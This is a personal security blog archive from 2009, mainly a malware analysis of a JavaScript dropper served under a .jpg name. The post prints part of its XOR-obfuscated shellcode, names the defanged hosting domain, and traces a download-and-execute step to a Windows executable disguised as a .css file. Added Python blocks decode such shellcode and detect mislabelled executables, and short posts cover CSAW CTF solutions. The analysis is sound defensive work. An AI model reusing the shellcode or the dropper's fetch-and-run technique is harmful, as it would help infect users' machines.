Archive for November, 2009

27 Nov 09

shellcode does what?!

I had an IPS event pop up that I got to review.

The file is a set of static JavaScript variables (bit of an oxymoron, I know 😛) with shellcode defined in them.

Ran the URL into my local jsunpack and had a look at what it was able to find.

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u "bbs. xcdx169. net /images /img /k /lll.jpg"
URL fetch bbs. xcdx169. net /images /img /k /lll.jpg
(referer=www.google.com/trends/hottrends)
saved 4420 bytes to ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

Processing ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a
[nothing detected] bbs. xcdx169. net /images /img /k /lll.jpg
info: [decodingLevel=0] found JavaScript
info: saved original parsed JavaScript to ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

[file] created ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg
[file] created ./files/veryverbose_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a from bbs. xcdx169. net /images /img /k /lll.jpg

matt@malicious:~/research/jsunpack-n$ cat ./files/fetch_9ea2e60fd34ad1b771a600faa7f0c5cc88d31f2a

var YT00="\xu10EB\xu4B5B\xuC933\xuFBB1\xu04B5\xu3480\xuF40B\xuFAE2\xu05EB\xuEBE8\xuFFFF\xu1DFF\xuF0AE\xuF4F4\xu90AB\xuC455";
var YT01="\xuF4F4\xu7FF4\xuF8B4\xu847F\xu59E8\xu9C7F\xu7FFC\xu9E03\xuADFB\xu0E1C\xuF4F7\xu16F4\xu9E0D\xu9C98\xu809A\xu9890";

..... Cut for blog (download link above if you want to look at the full thing.)

var YT23="\xuD0AA\xu29F7\xu7F92\xuBFF8\xuAA7F\xuF7E8\xu7F29\xu7FF0\xu31F7\xuAA5F\xu37AD\xu551C\xu0B0F\xu7A0B\xuFABA\xu5E18";
var YT24="\xuF908\xu7C88\xuB90E\xu512F\xuF4E3\xuE288\xu0E91\xuEBE4\xuFE8D\xu0F1C\xu0963\xuD1FB\xu0B44\xu1036\xuBE30\xuEF1B";
var YT25="\xuB232\xu8A8D\xu162C\xu3487\xu1663\xu291B\xu4968\xu6886\xuEE61\xu559A\xuC99E\xu162C\xu953E\xuA312\xu4154\xuC24F";
var YT26="\xuDBEE\xuE684\xu3FF6\xu6EE1\xu8ADF\xu11AF\xuDCE8\xuBE3B\xu0FFC\xu5141\xu9CEE\xu281F\xu9A3E";
var YT27="\xu9c9f\xu8080\xuce84\xudbdb\xu9696\xuda87\xu978c\xu8c90\xuc2c5\xudacd\xu919a\xudb80\xu999d\xu9395\xu8791\xu9ddb\xu9399\xu9cdb\xuda8c\xu8797\xuf487\xuf4";

matt@malicious:~/research/jsunpack-n$

(I've edited the shellcode from % to \x, so if you download the above file and see it is different, don't think I'm making stuff up 😛)

Since I’ve not seen what has delivered this to the user, I’m left with loading it somehow to review it.

I dump the shellcode into http://sandsprite.com/shellcode_2_exe.php, which gives you a .exe file with the shellcode attached, so you can load it up in OllyDbg and have a quick look.

As you can see, there is the original stub that calls WSAStartup so that any winsock references in the shellcode resolve. I've also highlighted, within the small piece of code attached from the shellcode, that it is another stub, this one for XOR decryption. The XOR key is right there: 0xF4. There are two ways to go from here: we could step through the code and let it decrypt itself, or, since we know the XOR key, copy and paste the rest of the shellcode into WinHex and manually decode the whole block.

We click OK and the code should dump out like this.

And at the end of the block we can see another URL that will be downloaded by the shellcode and executed.
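The whole procedure above (pull the %u strings out of the JavaScript, lay them out as bytes, XOR with 0xF4, read the URL off the end of the block) as an added Python example. This is my code, not the author's, and it runs on a constructed sample with a placeholder URL rather than on the post's shellcode. It also accepts the \xu form the listing was edited into and, going one step beyond the post, recovers the single-byte key by brute force for the case where you have not yet spotted it in the decoder stub:

```python
import re
from typing import List, Optional, Tuple

XOR_KEY = 0xF4  # the single-byte key read off the decoder stub in OllyDbg

# `var YT00="...";` (also accepts the curly quotes a blog CMS substitutes for ")
VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*["\u201c\u201d]([^"\u201c\u201d\u2033]*)["\u201d\u2033]\s*;')
# one %uXXXX unit; also matches the \xuXXXX form the post was edited into
UNIT_RE = re.compile(r'(?:%|\\x)u([0-9A-Fa-f]{2,4})')


def unescape_u(s: str) -> bytes:
    """Turn a %u-escaped string into the bytes it occupies in memory.

    Each %uXXYY is a UTF-16LE code unit, so the low byte (YY) comes first.
    """
    out = bytearray()
    for m in UNIT_RE.finditer(s):
        h = m.group(1)
        if len(h) == 4:
            out.append(int(h[2:], 16))
            out.append(int(h[:2], 16))
        elif len(h) == 2:          # a trailing odd byte, as in the post's final \xuf4
            out.append(int(h, 16))
        else:
            raise ValueError(f"malformed escape {m.group(0)!r}")
    return bytes(out)


def shellcode_from_js(js: str) -> bytes:
    """Concatenate every YTnn-style string variable in name order."""
    parts: List[Tuple[str, str]] = sorted(VAR_RE.findall(js), key=lambda kv: kv[0])
    return b"".join(unescape_u(body) for _, body in parts)


def xor_decode(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def guess_xor_key(data: bytes, marker: bytes = b"http://") -> Optional[int]:
    """Brute-force a single-byte XOR key using a known plaintext (the download URL)."""
    for key in range(256):
        if marker in xor_decode(data, key):
            return key
    return None


def ascii_strings(data: bytes, min_len: int = 6) -> List[str]:
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def to_u_escapes(data: bytes, prefix: str = "%") -> str:
    """Inverse of unescape_u; used only to build the constructed sample below."""
    if len(data) % 2:
        raise ValueError("%u encoding needs an even number of bytes")
    return "".join(f"{prefix}u{data[i + 1]:02X}{data[i]:02X}" for i in range(0, len(data), 2))


# Constructed sample, NOT the shellcode from the post: a few filler bytes, then a
# placeholder URL, XOR'd with 0xF4 and split across two variables like the dropper.
SAMPLE_PLAIN = b"\x90\x90\xeb\x05http://example.com/stage2.bin\x00"
_ENC = xor_decode(SAMPLE_PLAIN, XOR_KEY)
SAMPLE_JS = (
    'var YT00="' + to_u_escapes(_ENC[:16]) + '";\n'
    'var YT01="' + to_u_escapes(_ENC[16:]) + '";\n'
)


def analyse(js: str) -> dict:
    raw = shellcode_from_js(js)
    key = guess_xor_key(raw)
    decoded = xor_decode(raw, key) if key is not None else raw
    return {"length": len(raw), "key": key, "strings": ascii_strings(decoded)}


if __name__ == "__main__":
    result = analyse(SAMPLE_JS)
    print(f"{result['length']} bytes, XOR key {result['key']:#04x}, strings: {result['strings']}")
```

Sorting on the variable name is what keeps YT00 through YT27 in order when the page concatenates them. The key search only works because the plaintext contains a predictable marker, which is exactly why the URL at the end of the block is the first thing worth looking for.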

matt@malicious:~/research/jsunpack-n$ ./jsunpack-n.py -a -V -u "http://bbs. xcdx169. net /images /img /hx.css"
URL fetch bbs. xcdx169. net /images /img /hx.css
(referer=www.google.com/trends/hottrends)
saved 25088 bytes to ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

Processing ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
[nothing detected] [MZ] bbs. xcdx169. net /images /img /hx.css
info: [0] executable file

[file] created ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef from bbs. xcdx169. net /images /img /hx.css

matt@malicious:~/research/jsunpack-n$ file ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
matt@malicious:~/research/jsunpack-n$ md5sum ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef
883e3c54c21fda4efae0fc85ff96724c  ./files/fetch_8c3187ccfb755b516513ae9f68579b7bc75b0cef

We have a .exe that the site served under a .css name. This .exe has reasonable detection coverage on VirusTotal.

http://www.virustotal.com/analisis/ba998b7df2fa3dd3816e8bb57798ff35d6a942be2f8cddde6647b8067ca42d30-1259022619
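One check a defender can automate from this finding is "URL says .css, body says MZ". The following is an added Python example (mine, not the author's or jsunpack's) that parses the DOS and COFF headers just far enough to report the same facts `file` printed above and to hash the body, run against a constructed minimal PE header standing in for hx.css:

```python
import hashlib
import struct
from typing import Dict, Optional

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEM = {2: "GUI", 3: "console"}
# extensions a web server would normally serve as text or images, never as a program
WEB_CONTENT_EXT = (".css", ".js", ".jpg", ".jpeg", ".gif", ".png", ".html", ".htm")


def identify_pe(data: bytes) -> Optional[Dict[str, object]]:
    """Parse just enough of a PE image to report what `file` reported; None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # need the 4-byte signature plus the 20-byte COFF header
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, _nsect, _stamp, _symptr, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + opt_size > len(data):   # Subsystem sits at optional-header offset 68
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    return {
        "format": OPTIONAL_MAGIC.get(magic, f"unknown({magic:#x})"),
        "machine": "Intel 80386" if machine == IMAGE_FILE_MACHINE_I386 else f"{machine:#x}",
        "subsystem": SUBSYSTEM.get(subsystem, str(subsystem)),
        "dll": bool(chars & IMAGE_FILE_DLL),
        "md5": hashlib.md5(data).hexdigest(),
    }


def extension_mismatch(url_path: str, data: bytes) -> bool:
    """Flag a fetch whose URL promises web content but whose body is a Windows executable."""
    return url_path.lower().endswith(WEB_CONTENT_EXT) and identify_pe(data) is not None


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 header (no sections, does not run); stands in for hx.css."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE signature right after the DOS header
    opt = bytearray(224)                       # PE32 optional header incl. 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)      # PE32 magic
    struct.pack_into("<H", opt, 68, 2)         # IMAGE_SUBSYSTEM_WINDOWS_GUI
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 0, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    body = build_sample_pe()
    print(identify_pe(body))
    print("mismatch:", extension_mismatch("/images/img/hx.css", body))
```

The header walk deliberately checks bounds before every read: a fetched body that starts with MZ but is truncated or padded is a common way to crash a naive triage script, and None is the right answer for it rather than an exception.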

21 Nov 09

CSAW CTF video #2

This is the video for binaries 2.exe, 3.exe and 4.exe. These aren't intended to be major in-depth tutorials, only a demonstration of how I retrieved the flag from each binary. I'm not the greatest at reversing or making videos. I just like to share whatever I can. :]


Thanks for your positive comments so far 😀

19 Nov 09

CSAW CTF video #1

After the Capture the Flag event of CSAW, Stephen Ridley released the source and binaries for the challenges on his GitHub at http://github.com/s7ephen/CSAW_2009 . I spent a couple of hours and did the challenges and found them to be fun while still quite simple at times. Later challenges are a real challenge for me as they require some coding to load libraries and I've not coded anything properly in years. 😀

Here is the first binary solution.  I may remake this video at a lower resolution so it will be easier to read.

06 Nov 09

Intention

Moved this to the About page :]

http://www.twitter.com/lordparody . I'll announce any new posts via Twitter.

06 Nov 09

My Spoon is too big!

I am a Banana!